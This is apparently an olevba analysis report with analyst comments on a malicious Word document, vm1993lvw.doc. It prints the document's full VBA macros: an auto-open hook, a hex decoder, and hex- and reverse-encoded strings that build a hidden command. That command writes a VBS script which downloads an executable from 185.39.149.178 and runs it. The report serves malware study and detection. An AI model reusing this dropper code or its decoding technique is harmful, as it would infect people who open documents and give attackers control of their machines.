- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIH-- vm1993lvw.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: vm1993lvw.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ' Auto-executing entry point: Word runs this procedure when the document is
- ' opened (olevba flags it as AutoExec/AutoOpen in the table below). Its only
- ' statement calls Module1.sdf, which decodes and launches the payload command.
- sdf
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub sdf()
- ' Builds a command line from three hex-encoded chunks and executes it.
- ' Every chunk goes through HJbjbkljgIUGI (Module2), which turns hex pairs
- ' back into characters; the second chunk is additionally stored reversed and
- ' undone with StrReverse, which is why olevba tags its keywords
- ' "StrReverse+Hex". The IOCs olevba recovers below (cmd.exe, cscript.exe, a
- ' dropped gyuFYFGuig.vbs, dfsdfff.exe, Microsoft.XMLHTTP / ADODB.Stream, the
- ' 185.39.149.178 URL) indicate a download-and-execute dropper; run olevba
- ' with --decode to read the full decoded text.
- jFHGVCsdf = HJbjbkljgIUGI("406563686f20677975465946477569676464642e53656e643e3e677975465946477569672e766273202620406563686f2053657420656e7669726f6e6d656e7456617273203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22292e456e7669726f6e6d656e74282250726f6365737322293e3e677975465946477569672e766273202620406563686f2074656d70466f6c646572203d20656e7669726f6e6d656e7456617273282254454d5022293e3e677975465946477569672e766273202620406563686f2046696c656f70656e203d2074656d70466f6c646572202b20225c646673646666662e657865223e3e677975465946477569672e766273202620406563686f207769746820625374726d3e3e677975465946477569672e766273202620406563686f202020202e74797065203d2031203e3e677975465946477569672e766273202620406563686f20202020202e6f70656e3e3e677975465946477569672e766273202620406563686f20202020202e777269746520677975465946477569676464642e726573706f6e7365426f64793e3e677975465946477569672e766273202620")
- ' Second obfuscation layer: the hex text is stored backwards and reversed
- ' before decoding.
- JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("026202372667e276965774649564579776e3e35637c6166402c222669676e24303567616d696f297d687a73716f2837313e2934313e29333e2538313f2f2a3074747862202c2224554742202e65607f4e24646467696577464956457977602f686365604026202372667e276965774649564579776e3e39222d61656274735e22646f646142282473656a626f656471656273602d302d6274735260247563502a3d62747352602d6964602f686365604026202372667e276965774649564579776e3922205454584c4d485e24766f637f6273696d42282473656a626f656471656273602d302464646769657746495645797760247563502a34646467696577464956457977602d6964602f6863656040236f202568756e246d636"))
- GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
- ' Assembly order differs from the order the chunks are decoded: the reversed
- ' chunk comes first.
- sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
- ' Window style 0 (vbHide): the spawned process gets no visible window.
- ' From a detection standpoint the observable is the Word process spawning
- ' cmd.exe / cscript.exe with a .vbs argument.
- Shell sdddd, 0
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object (obfuscation: |
- | | | Hex) |
- | Suspicious | SaveToFile | May create a text file (obfuscation: |
- | | | Hex) |
- | Suspicious | Open | May open a file (obfuscation: Hex) |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command (obfuscation: Hex) |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command (obfuscation: Hex) |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) (obfuscation: Hex) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) (obfuscation: Hex) |
- | Suspicious | CreateObject | May create an OLE object (obfuscation: |
- | | | StrReverse+Hex) |
- | Suspicious | ADODB.Stream | May create a text file (obfuscation: |
- | | | StrReverse+Hex) |
- | Suspicious | Open | May open a file (obfuscation: |
- | | | StrReverse+Hex) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: StrReverse+Hex) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | IOC | gyuFYFGuig.vbs | Executable file name (obfuscation: Hex) |
- | IOC | dfsdfff.exe | Executable file name (obfuscation: Hex) |
- | IOC | cscript.exe | Executable file name (obfuscation: Hex) |
- | IOC | http://185.39.149.17 | URL (obfuscation: StrReverse+Hex) |
- | | 8/aszxmy/image04.gif | |
- | IOC | 185.39.149.178 | IPv4 address (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | cmd.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | gyuFYFGuig.vbs | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
- ' Hex decoder used by Module1.sdf: every two characters of kZtkbozi are read
- ' as one hexadecimal byte value and converted to the matching character; the
- ' concatenation of those characters is returned.
- ' Note: in a VBA Dim list only the last name gets the "As Integer" type, so
- ' CqINRagdDXnLii12 is actually a Variant here.
- Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
- JvigRuKAuHzAIK17 = 2912
- ' The value accumulated in this loop is never read afterwards; the loop only
- ' burns a few iterations and yields via DoEvents. Presumably filler/evasion
- ' noise -- it has no effect on the decoded output.
- For CqINRagdDXnLii12 = 0 To 65
- JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
- DoEvents
- Next CqINRagdDXnLii12
- ' Chr$(38) & Chr$(72) is the literal "&H"; prefixing a two-character slice
- ' with it makes Val() parse the slice as a hex number, and Chr$ turns that
- ' number into the decoded character. Building "&H" from Chr$ keeps the
- ' tell-tale "&H" out of the source text (olevba still flags Chr below).
- ' TQmHIRcQAPjC, UGiEQf and ePUuigaspLiGL are never declared (no Option
- ' Explicit is visible), so they are implicit Variants.
- For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
- UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
- ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
- Next TQmHIRcQAPjC
- HJbjbkljgIUGI = ePUuigaspLiGL
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+